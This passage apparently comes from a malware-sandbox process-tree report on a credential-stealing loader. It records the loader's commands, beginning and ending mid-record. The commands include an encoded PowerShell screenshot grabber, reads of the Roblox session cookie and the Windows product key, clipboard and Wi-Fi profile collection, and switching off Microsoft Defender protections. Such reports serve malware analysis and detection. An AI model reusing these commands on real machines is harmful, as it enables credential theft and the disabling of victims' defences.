        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        
        PID:6536
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u5igepox\u5igepox.cmdline"
        6⤵
        
        PID:6984
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC3C8.tmp" "c:\Users\Admin\AppData\Local\Temp\u5igepox\CSCD44F37FE82A4F22AF10425A5736B9D.TMP"
        7⤵
        
        PID:7096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6744
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6848
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6932
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:7024
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:7120
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3348"
      4⤵
      PID:6228
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3348
        5⤵
        Kills process with taskkill
        
        PID:6336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2740"
      4⤵
      PID:6364
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2740
        5⤵
        Kills process with taskkill
        
        PID:6404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5076"
      4⤵
      PID:3236
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5076
        5⤵
        Kills process with taskkill
        
        PID:6420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5104"
      4⤵
      PID:2880
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5104
        5⤵
        Kills process with taskkill
        
        PID:6752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4432"
      4⤵
      PID:6868
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4432
        5⤵
        Kills process with taskkill
        
        PID:6732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1852"
      4⤵
      PID:6464
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1852
        5⤵
        Kills process with taskkill
        
        PID:6416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5724"
      4⤵
      PID:2468
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5724
        5⤵
        Kills process with taskkill
        
        PID:6972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4596"
      4⤵
      PID:6948
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4596
        5⤵
        Kills process with taskkill
        
        PID:7072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1956"
      4⤵
      PID:7036
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1956
        5⤵
        Kills process with taskkill
        
        PID:6656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1308
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:800
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:6596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:5760
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:6472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48482\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\ihqgu.zip" *"
      4⤵
      PID:2556
    - - C:\Users\Admin\AppData\Local\Temp\_MEI48482\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI48482\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\ihqgu.zip" *
        5⤵
        Executes dropped EXE
        
        PID:5420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:4188
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6224
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:6252
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6304
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:6580
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5756
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:1548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:460
- C:\Users\Admin\AppData\Local\Temp\7zO09589609\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO09589609\Loader.exe"
  2⤵
  - Executes dropped EXE
  PID:1496
- - C:\Users\Admin\AppData\Local\Temp\7zO09589609\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO09589609\Loader.exe"
    3⤵
    - Executes dropped EXE
    PID:3936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO09589609\Loader.exe'"
      4⤵
      PID:688
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO09589609\Loader.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:4732
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6756
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6840
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:4916
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:7072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:6940
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        
        PID:5344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6936
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:7016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:7100
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:7032
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:3576
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:6384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:2172
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB